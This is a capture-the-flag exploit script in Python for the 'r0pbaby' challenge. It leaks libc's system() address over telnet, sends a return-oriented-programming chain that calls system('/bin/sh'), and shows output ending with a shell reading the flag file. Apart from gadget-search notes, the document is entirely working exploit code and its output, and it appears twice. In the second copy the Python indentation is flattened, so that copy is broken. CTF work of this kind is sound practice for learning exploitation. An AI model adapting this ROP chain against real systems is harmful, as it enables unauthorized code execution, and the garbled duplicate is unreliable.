ytn86/exploit.py

## exploit.py
#!/usr/bin/env python3

import struct
import sys
import telnetlib


HOST = 'r0pbaby_542ee6516410709a1421141501f03760.quals.shallweplayaga.me'
PORT = 10436

"""
% strings -tx libc-2.19_15.so|grep "/bin/sh"
17ccdb /bin/sh
% rp --file=libc-2.19_15.so --rop=1 --unique|grep "pop rdi"
0x000fa47a: pop rdi ; call rax ; (1 found)
0x000831a8: pop rdi ; jmp rax ; (2 found)
0x00103fe2: pop rdi ; rep ret ; (2 found)
0x00022b1a: pop rdi ; ret ; (506 found)
0x001331ad: pop rdi ; retn 0xFFEE ; (1 found)
"""


binsh_offset = 0x17ccdb
system_offset = 0x46640
popret_offset = 0x22b1a


def rp(addr):
    addr = struct.pack('<Q', addr)
    return addr

def get_addr(tn, name):
    tn.write(b'2\n' + name.encode() + b'\n')
    tn.read_until(name.encode() + b': ')
    buf = tn.read_until(b'\n')
    addr = int(buf.decode(), 16)
    print(name + ' :{0}'.format(hex(addr)))
    return  addr

def exploit():
    tn = telnetlib.Telnet(HOST, PORT)
    system = get_addr(tn, 'system')
    payload = b'deadbeef'
    payload += rp(system - (system_offset - popret_offset))
    payload += rp(system - (system_offset - binsh_offset))
    payload += rp(system)
    payload += b'\n'
    tn.write(b'3\n')
    tn.write(b'32\n')
    tn.write(payload)
    tn.interact()

def main():
    exploit()


if __name__ == '__main__':
    main()


"""
% python exploit.py
system :0x7f6066881640
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Enter bytes to send (max 1024): 1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Bad choice.
cat /home/r0pbaby/flag
The flag is: W3lcome TO THE BIG L3agu3s kiddo, wasn't your first?
"""
	#!/usr/bin/env python3

	import struct
	import sys
	import telnetlib


	HOST = 'r0pbaby_542ee6516410709a1421141501f03760.quals.shallweplayaga.me'
	PORT = 10436

	"""
	% strings -tx libc-2.19_15.so\|grep "/bin/sh"
	17ccdb /bin/sh
	% rp --file=libc-2.19_15.so --rop=1 --unique\|grep "pop rdi"
	0x000fa47a: pop rdi ; call rax ; (1 found)
	0x000831a8: pop rdi ; jmp rax ; (2 found)
	0x00103fe2: pop rdi ; rep ret ; (2 found)
	0x00022b1a: pop rdi ; ret ; (506 found)
	0x001331ad: pop rdi ; retn 0xFFEE ; (1 found)
	"""


	binsh_offset = 0x17ccdb
	system_offset = 0x46640
	popret_offset = 0x22b1a


	def rp(addr):
	addr = struct.pack('<Q', addr)
	return addr

	def get_addr(tn, name):
	tn.write(b'2\n' + name.encode() + b'\n')
	tn.read_until(name.encode() + b': ')
	buf = tn.read_until(b'\n')
	addr = int(buf.decode(), 16)
	print(name + ' :{0}'.format(hex(addr)))
	return addr

	def exploit():
	tn = telnetlib.Telnet(HOST, PORT)
	system = get_addr(tn, 'system')
	payload = b'deadbeef'
	payload += rp(system - (system_offset - popret_offset))
	payload += rp(system - (system_offset - binsh_offset))
	payload += rp(system)
	payload += b'\n'
	tn.write(b'3\n')
	tn.write(b'32\n')
	tn.write(payload)
	tn.interact()

	def main():
	exploit()


	if __name__ == '__main__':
	main()


	"""
	% python exploit.py
	system :0x7f6066881640
	1) Get libc address
	2) Get address of a libc function
	3) Nom nom r0p buffer to stack
	4) Exit
	: Enter bytes to send (max 1024): 1) Get libc address
	2) Get address of a libc function
	3) Nom nom r0p buffer to stack
	4) Exit
	: Bad choice.
	cat /home/r0pbaby/flag
	The flag is: W3lcome TO THE BIG L3agu3s kiddo, wasn't your first?
	"""